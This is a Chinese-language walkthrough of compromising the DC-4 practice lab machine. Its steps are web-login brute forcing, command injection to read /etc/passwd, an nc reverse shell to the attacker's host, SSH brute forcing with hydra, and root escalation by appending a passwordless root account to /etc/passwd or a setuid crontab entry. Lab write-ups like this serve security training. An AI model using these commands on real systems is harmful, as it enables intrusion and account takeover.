打靶系列之- DC-4

admin 2021年7月24日09:19:51评论79 views字数 1520阅读5分4秒阅读模式

01 项目安装

首先咱们需要将DC-4的靶机下载,并安装到咱们的靶机上

下载地址是:https://www.five86.com/dc-4.html

打靶系列之- DC-4

进入页面点击here 进行下载

下载好之后,导入咱们的虚拟机

打靶系列之- DC-4

看到这个页面,表示我们靶机安装成功,接下来就是拿下它


02 信息收集

首先我们进行信息收集,获取靶机的ip和相关端口

#获取ip地址
nmap 192.168.31.0/24

打靶系列之- DC-4

可以看到靶机开启了80端口,页面访问一下

打靶系列之- DC-4

可以访问成功,可以看到直接就让输入账户和密码


03 爆破账号密码

既然看到了登录密码框,而且提示,账户名为:admin,只需要就用BurpSuite将密码爆破出来

打靶系列之- DC-4

最后爆出 账号名: admin , 密码: happy


04 命令注入

进入网页之后可以看到,居然是可以执行linux命令

打靶系列之- DC-4

既然如此,用BurpSuite拦截下

打靶系列之- DC-4

可以看到页面确实在往后台传递命令,那么这里存在命令注入漏洞

将 ls+-l 修改为 cat+/etc/passwd ,获取下服务器密码

打靶系列之- DC-4

可以看到直接获取了服务器的用户名

打靶系列之- DC-4

将有用的提取出来

#服务器用户名
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

既然可以执行命令,那直接反弹shell

nc+192.168.31.81+1234+-e+/bin/bash

打靶系列之- DC-4

在kali上监听1234端口

打靶系列之- DC-4

攻击机上已经获取到了shell

#获取完全交互的shell

python -c 'import pty;pty.spawn("/bin/sh")'

链接上靶机之后,看下服务器上面都有什么,最后发现只有jim文件下有类似密码备份

打靶系列之- DC-4

打靶系列之- DC-4

在kali中创建个文件,将密码保存起来

#将密码放入文件,保存
vim pass.txt
:wq

在创建个文件,用来存储服务器的用户名

打靶系列之- DC-4


05 ssh爆破

既然有了用户名列表,也有了密码列表,那么就开始对服务器进行爆破

#在kali中使用hydra进行爆破
hydra -L user.txt -P pass.txt  ssh://192.168.31.145 -s  22

打靶系列之- DC-4

可以看到账号是: jim ,密码是: jibril04

使用ssh远程登录jim的账号

ssh [email protected]

打靶系列之- DC-4

登录成功


06 获取信息

在服务器中,可以看到Charles发送给Jim的一份邮件

在var/mail文件夹下

打靶系列之- DC-4

可以看到 Charles的密码是 ^xHhA&hvim0y

ssh链接一下

ssh [email protected]

打靶系列之- DC-4

登录成功


07 提权

执行

sudo -l

打靶系列之- DC-4

可以看到一个root权限无密码执行的脚本

可以通过这个脚本进行提权

这个脚本具体是做什么用的?它主要是把内容写入一个文件的中的末尾

既然知道脚本的功能,那么这个地方就有两种办法提取

第一种,创建一个具有root权限的用户

#创建新的root权限账户
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd


第二种,定时任务

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

/bin/sh

打靶系列之- DC-4

提权成功

最后查看root目录下的目标

打靶系列之- DC-4


08 总结

1. 使用BurpSuite对网页登录框,进行密码账号爆破

2. 通过命令注入漏洞,进行命令注入

3. 使用hydra对ssh进行爆破

4. 通过现有的脚本进行提权操作


-END-

打靶系列之- DC-4
打靶系列之- DC-4
微信号:Zero-safety

-扫码关注我们-

带你领略不一样的世界

打靶系列之- DC-4


本文始发于微信公众号(零度安全攻防实验室):打靶系列之- DC-4

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月24日09:19:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   打靶系列之- DC-4http://cn-sec.com/archives/369494.html

发表评论

匿名网友 填写信息